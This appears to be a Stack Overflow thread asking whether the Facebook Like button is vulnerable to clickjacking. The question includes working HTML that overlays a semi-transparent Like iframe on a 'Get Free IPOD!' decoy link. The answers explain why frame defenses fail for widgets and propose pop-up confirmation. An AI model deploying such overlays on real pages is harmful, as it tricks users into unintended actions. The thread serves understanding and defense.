Does facebook like button vulnerable to clickjacking?

Question

Few days before I have read regarding clickjacking attack from http://javascript.info/tutorial/clickjacking . So today I tried with facebook like button. and It seems that i am successful in the experiment.

But i am not sure weather i am correct or not? This is the code snippet I have used.

<html>
<head>
    <script>
      window.fbAsyncInit = function() {
        FB.init({
          appId      : '********',
          xfbml      : true,
          version    : 'v2.1'
        });
      };

      (function(d, s, id){
         var js, fjs = d.getElementsByTagName(s)[0];
         if (d.getElementById(id)) {return;}
         js = d.createElement(s); js.id = id;
         js.src = "//connect.facebook.net/en_US/sdk.js";
         fjs.parentNode.insertBefore(js, fjs);
       }(document, 'script', 'facebook-jssdk'));
    </script>
    <style>
        iframe { /* iframe from facebook.com */
          width:140px;
          height:100px;
          margin-top: 100px;
          margin-left: 50px;
          position:absolute;
          top:0; left:0;
          filter:alpha(opacity=50); /* in real life opacity=0 */
          opacity:0.5;
        }
        .a{
            margin-top: 95px;
        }
    </style>
</head>
<body>
    <div class="a">
        <a  href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">Get Free IPOD!</a>
    </div>
    <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2FTimesnow&amp;width&amp;layout=button&amp;action=like&amp;show_faces=false&amp;share=false&amp;height=35&amp;appId=*****" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:35px;" allowTransparency="true"></iframe>
</body>
</html>

Here is the screenshot.

I can set the opacity of the iframe to 0 so that user can not see the fb like button when the user will click on the link , the attacker page will be automatically liked.

Example Fiddle: http://jsfiddle.net/5e5kvxk4/2/

Am I missing something? or facebook like button is really vulnerable ?

Yep it is. That's why a install a plugin on my browser that prevents facebook buttons from working offsite. Anyways, what's your question? — Dave Chen, Sep 24 '14 at 14:33
Well, how could this be prevented without disallowing any embedded buttons? — Bergi, Sep 24 '14 at 14:35
@DaveChen: I am surprised that facebook is vulnerable. thats what I was asking, facebook does not take any prevention measures for this? — user3427540, Sep 24 '14 at 14:39
It does violate their policies, but I can see how it would be difficult to prevent. Note that like buttons should work offsite, so detecting if they are obstructed in view would be impossible for facebook to do. — Dave Chen, Sep 24 '14 at 14:50
This issue is not specific to the FB like button in any way. And rest assured that Facebook is taking all measures against this that they possibly can – but in this situation, there is not much that _can_ be done without breaking the intended functionality. (The counter-measures the page you linked to simply don’t apply here – the Like button is inside an iframe on purpose, so any kind of “frame breaking” would not make any sense whatsoever here in the first place.) — CBroe, Sep 25 '14 at 12:05

score 6 · Answer 1 · edited Jun 20 '20 at 09:12

Yes, it probably is vulnerable to click jacking. There isn't a good solution to protect widgets from forged requests using current web technologies.

The widget will either be vulnerable to clickjacking or CSRF as explained here:

From "How to protect widgets from forged requests":

You don't want this [widget] to be vulnerable to CSRF so you write an iframe to the page. Based on the origin inheritance rules the parent site won't be able to read the CSRF token. However what about clickjacking (or likejacking )? Because of CSRF you must be within an iframe and there for the x-frame-options cannot help, and the same holds true for frame-busters

The best solution at present appears to be employing a pop up window in order to validate the click:

Clicking on the widget needs to open a pop-up window containing a new page -- an iframe is not good enough, it must be a new window -- which is entirely under the control of your web application. Confirm the action, whatever it is, on that page.

Yes, this is somewhat inelegant, but the present Web security architecture doesn't give you any better options.

Does facebook like button vulnerable to clickjacking?

1 Answers1